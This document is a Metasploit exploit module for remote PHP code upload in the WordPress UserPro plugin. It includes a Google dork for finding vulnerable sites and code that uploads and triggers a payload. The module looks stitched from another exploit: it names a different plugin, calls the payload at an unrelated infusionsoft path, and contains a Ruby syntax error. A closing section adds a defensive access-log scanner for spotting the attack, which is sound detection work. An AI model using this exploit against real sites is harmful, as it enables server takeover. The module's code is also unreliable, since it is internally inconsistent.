WordPress Userpro Remote File Upload
Source: metasploit.com  Author: T3rm!nat0r5  Published: 2016-10-25
# Exploit Title : Wordpress Userpro Remote File Upload
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://userproplugin.com/
# Google Dork : inurl:/wp-content/plugins/userpro/
# Date : 10/20/2016
# Tested on : Windows10/Linux
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Userpro Unauthorized Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the
        wordpress Ifileupload plugin.
        The vulnerability allows for unauthorized file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'T3rm!nat0r5',
          'termijan <poyaterminator@gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['Ref', 'http://priv8.termijan/'],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['userpro', {}]],
      'DisclosureDate' => 'Oct 20 2016',
      'DefaultTarget'  => 0)
    )
  end

  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'userpro', 'userpro',
                                'lib', 'fileupload', 'fileupload.php')
    )

    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /userpro/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wp-content, 'plugins',
                     'userpro', 'lib', 'fileupload' , 'fileupload.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
    end

    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end

end
# Exploit by T3rm!nat0r5
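
For defenders, the request sequence this module produces (a GET probe of fileupload.php, a POST to the same script, then a request for a .php file named with 8 to 15 random letters) can be searched for in web server access logs. The Ruby sketch below is an added example, not part of the original module; the log lines are constructed samples, and looking for the dropped file anywhere under /wp-content/plugins/ is an assumption of this example.

```ruby
# Added defensive example (not part of the original module).
# Script the module probes (GET) and uploads through (POST).
UPLOAD_RE  = %r{/wp-content/plugins/userpro/lib/fileupload/fileupload\.php}i
# The module names its file with 8-15 random letters + ".php"; searching every
# plugin directory for such a name is an assumption of this example.
DROPPED_RE = %r{/wp-content/plugins/(?:[^\s?/]+/)*[A-Za-z]{8,15}\.php(?:\?|\z)}
# Common/combined log format: client, timestamp, method, URI, status.
LINE_RE    = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/

def parse(line)
  m = LINE_RE.match(line)
  m && { ip: m[1], time: m[2], method: m[3], uri: m[4], status: m[5].to_i }
end

# Returns alerts in log order. Random-name hits are reported only for clients
# that already POSTed to the upload script, because legitimate plugin files
# can also have 8-15 letter names.
def scan(lines)
  uploaders = {}
  lines.each_with_object([]) do |line, alerts|
    r = parse(line) or next
    ok = r[:status] == 200
    if r[:uri] =~ UPLOAD_RE
      if r[:method] == 'POST'
        uploaders[r[:ip]] = true
        alerts << r.merge(type: :upload_attempt, severity: ok ? :high : :medium)
      else
        alerts << r.merge(type: :probe, severity: :low)
      end
    elsif uploaders[r[:ip]] && r[:uri] =~ DROPPED_RE
      alerts << r.merge(type: :dropped_file_call, severity: ok ? :critical : :high)
    end
  end
end

# Constructed sample log (documentation IP ranges, made-up file names).
SAMPLE_LOG = <<~LOG.lines
  192.0.2.10 - - [25/Oct/2016:10:00:01 +0000] "GET /wp-content/plugins/userpro/lib/fileupload/fileupload.php HTTP/1.1" 200 512
  192.0.2.10 - - [25/Oct/2016:10:00:03 +0000] "POST /wp-content/plugins/userpro/lib/fileupload/fileupload.php HTTP/1.1" 200 96
  198.51.100.7 - - [25/Oct/2016:10:00:04 +0000] "GET /wp-content/plugins/example/settings.php HTTP/1.1" 200 2048
  192.0.2.10 - - [25/Oct/2016:10:00:05 +0000] "GET /wp-content/plugins/userpro/lib/fileupload/qWeRtYuIoP.php HTTP/1.1" 200 0
LOG

scan(SAMPLE_LOG).each do |a|
  puts "#{a[:severity].to_s.upcase} #{a[:type]} #{a[:ip]} #{a[:method]} #{a[:uri]}"
end
```

Access logs do not record POST bodies, so the fileNamePattern and fileTemplate parameters are not visible here; matching on them requires a WAF or request-body logging.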

 